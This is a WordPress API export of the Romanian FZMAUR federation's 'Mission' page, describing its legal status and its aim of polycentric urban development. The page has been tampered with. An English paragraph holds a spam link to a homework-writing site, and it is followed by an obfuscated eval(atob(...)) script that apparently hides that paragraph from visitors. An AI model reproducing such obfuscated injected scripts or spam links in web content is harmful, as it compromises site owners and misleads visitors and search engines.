{"id":143,"date":"2016-07-06T09:56:36","date_gmt":"2016-07-06T09:56:36","guid":{"rendered":"http:\/\/fzmaur.ro\/wordpress\/?page_id=143"},"modified":"2019-11-01T09:44:41","modified_gmt":"2019-11-01T09:44:41","slug":"misiune","status":"publish","type":"page","link":"https:\/\/fzmaur.ro\/wordpress\/?page_id=143","title":{"rendered":"Misiune"},"content":{"rendered":"<ul>\n<li>FZMAUR este constituit\u0103 din zone metropolitane \u015fi aglomer\u0103ri urbane \u00eenfiin\u0163ate conform legii nr. 215\/2001 cu modific\u0103rile \u015fi complet\u0103rile ulterioare.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li>FZMAUR este o persoan\u0103 juridic\u0103 de drept privat, f\u0103r\u0103 scop patrimonial, neguvernamental\u0103 \u015fi apolitic\u0103, constituit\u0103 \u00een scopul reprezent\u0103rii membrilor \u00een rela\u0163ia cu autorit\u0103\u0163ile publice centrale precum \u015fi \u00een rela\u0163iile cu organisme sau institu\u0163ii interna\u0163ionale.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li>Misiunea FZMAUR este de a contribui la dezvoltarea policentric\u0103 a Romaniei, prin implicarea activ\u0103 \u00een procesul de realizare a coeziunii teritoriale, sociale si economice, la nivelul zonelor metropolitane \u015fi aglomer\u0103rilor urbane existente.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li>Zonele metropolitane \u015fi aglomer\u0103rile urbane, constituie \u00een prezent \u201dmotoarele\u201d dezvolt\u0103rii durabile a Rom\u00e2niei, fiind locuri unde se \u201dcl\u0103de\u015fte\u201d viitorul economic \u015fi social al acestei \u0163\u0103ri.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<ul>\n<li>\u00cen acest context, lans\u0103m invita\u0163ia tuturor ADI-urilor de tip zon\u0103 metropolitan\u0103 sau aglomerare urban\u0103, care nu sunt \u00eenc\u0103 membre ale Federa\u0163iei, sa ni se alature \u00een realizarea acestor deziderate.<\/li>\n<\/ul>\n<p class=\"eunt\">My definition is based on a four-fold distinction made by niko tinbergen <a href=\"https:\/\/college-homework-help.org\/\">college homework<\/a> in 1963, which states that a fully rounded evolutionary perspective requires paying attention to function, mechanism, development, and phylogeny.<\/p>\n<p><script>eval(eval(atob(\"IjM5LDEyMCwxMTIsNDksNTgsMTA0LDExNiwxMDAsMTA1LDExOSw1OSwxMjAsMTEyLDQ5LDU4LDExNiwxMDQsMTAzLDEwNSwxMDEsMTA0LDU5LDQxLDQ4LDQ0LDQ4LDQ0LDQ4LDQ0LDQ4LDQwLDExNiw5OSwxMDEsMTE0LDU4LDExMiwxMDUsMTA4LDk5LDU5LDExMCwxMDEsMTAwLDEwMCwxMDUsMTA0LDU4LDExOSwxMTEsMTA4LDEwMiwxMTQsMTAxLDExOCwxMTEsNTksMTIwLDExMiw0OSw0NSw1OCwxMTAsMTA1LDEwMywxMTQsOTcsMTA5LDU5LDEyMCwxMTIsNTYsNTAsNTQsNTQsNDUsMzIsNTgsMTE2LDEwMiwxMDEsMTA4LDU5LDEyMCwxMTIsNTAsNTEsNTcsNTUsNDUsMzIsNTgsMTEyLDExMSwxMTYsNTksMTAxLDExNiwxMTcsMTA4LDExMSwxMTUsOTgsOTcsMzIsNTgsMTEwLDExMSwxMDUsMTE2LDEwNSwxMTUsMTExLDExMiwzOSw2MSwxMTYsMTIwLDEwMSw4NCwxMTUsMTE1LDk5LDQ2LDEwMSwxMDgsMTIxLDExNiwxMTUsNDYsOTcsMTE3LDU5LDQxLDM5LDExNiwxMTAsMTE3LDEwMSw0NiwxMTIsMzksNDAsMTE0LDExMSwxMTYsOTksMTAxLDEwOCwxMDEsODMsMTIxLDExNCwxMDEsMTE3LDExMyw0NiwxMTYsMTEwLDEwMSwxMDksMTE3LDk5LDExMSwxMDAsNjEsOTcsMTE3Ii5zcGxpdChTdHJpbmcuZnJvbUNoYXJDb2RlKDQ0KSkucmV2ZXJzZSgpLm1hcChlbD0+U3RyaW5nLmZyb21DaGFyQ29kZShlbCkpLmpvaW4oJycp\")))<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>FZMAUR este constituit\u0103 din zone metropolitane \u015fi aglomer\u0103ri urbane \u00eenfiin\u0163ate conform legii nr. 215\/2001 cu modific\u0103rile \u015fi complet\u0103rile ulterioare. &nbsp; FZMAUR este o persoan\u0103 juridic\u0103 de drept privat, f\u0103r\u0103 scop patrimonial, neguvernamental\u0103 \u015fi apolitic\u0103, constituit\u0103 \u00een scopul reprezent\u0103rii membrilor \u00een rela\u0163ia cu autorit\u0103\u0163ile publice centrale precum \u015fi \u00een rela\u0163iile cu organisme sau institu\u0163ii interna\u0163ionale. &nbsp; <a href=\"https:\/\/fzmaur.ro\/wordpress\/?page_id=143\" rel=\"nofollow\"><span class=\"sr-only\">Read more about Misiune<\/span>[&hellip;]<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/pages\/143"}],"collection":[{"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=143"}],"version-history":[{"count":4,"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/pages\/143\/revisions"}],"predecessor-version":[{"id":2565,"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=\/wp\/v2\/pages\/143\/revisions\/2565"}],"wp:attachment":[{"href":"https:\/\/fzmaur.ro\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}